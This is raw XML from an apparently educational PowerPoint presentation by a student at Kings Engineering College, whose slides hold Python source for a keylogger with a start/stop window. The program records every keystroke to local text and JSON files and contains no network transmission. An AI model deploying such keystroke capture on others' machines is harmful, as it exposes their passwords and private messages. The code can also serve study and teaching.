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665758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486724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02434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485785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47148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92642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12717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178439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362049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823939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338014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8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2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2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2794297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223854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91292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490045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2"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1"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0"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6"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8"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9"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8999190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549216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7085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83199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759319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020974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95008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21118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921626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6687420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 and security</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P.RAMESH</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KINGS ENGINEERING COLLEGE</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995187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0901816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446819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230169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0504988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7260619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945470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1433508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29866"/>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矩形"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1346454" y="-7654081"/>
            <a:ext cx="4880609"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8" name="矩形"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1135374" y="1260162"/>
            <a:ext cx="2956335" cy="5120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import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tkinter</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as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tk</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from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tkinter</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import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from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pynput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import keyboard</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import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json</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flag = False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keys =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def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generate_text_log</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with open('key_log.txt', "w+") as keys:</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keys.write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def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generate_json_file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with open('</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key_log.json</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wb</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as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key_log</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key_list_bytes</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json.dumps</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).encode()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key_log.write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key_list_bytes</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def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on_press</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global flag,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keys</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if flag == False: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keys_used.append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{'Pressed': f'{key}'}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flag = True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if flag == True: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keys_used.append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{'Held': f'{key}'}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generate_json_file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def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on_release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global flag,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keys</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keys_used.append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{'Released': f'{key}'}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if flag == True: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flag = False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generate_json_file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endParaRPr lang="zh-CN" altLang="en-US" sz="800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:ea typeface="华文中宋" pitchFamily="0" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49" name="矩形"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="4409665" y="1348800"/>
            <a:ext cx="2956334" cy="3749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keys = keys + str(key)</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generate_text_log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(str(keys))</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def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start_keylogger</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global listener</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listener =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keyboard.Listener</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on_press</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on_press</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on_release</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on_release</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listener.start</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label.config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(text="[+] Keylogger is running!\n[!] Saving the keys in 'keylogger.txt'")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start_button.config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(state='disabled')</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stop_button.config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(state='normal')</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def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stop_keylogger</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global listener</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listener.stop</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label.config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(text="Keylogger stopped.")</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start_button.config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(state='normal')</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stop_button.config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(state='disabled')</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root = Tk()</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root.title</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("Keylogger")</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label = Label(root, text='Click "Start" to begin keylogging.')</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label.config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(anchor=CENTER)</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label.pack</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start_button</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 = Button(root, text="Start", command=</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start_keylogger</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start_button.pack</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(side=LEFT)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stop_button</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 = Button(root, text="Stop", command=</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stop_keylogger</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 state='disabled')</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stop_button.pack</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(side=RIGHT)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root.geometry</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("250x250")</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root.mainloop</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endParaRPr lang="zh-CN" altLang="en-US" sz="800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
              <a:solidFill>
                <a:schemeClr val="tx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89183770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409058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3"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8330310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25</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-05-26T16:50:10Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-04-15T03:10:58Z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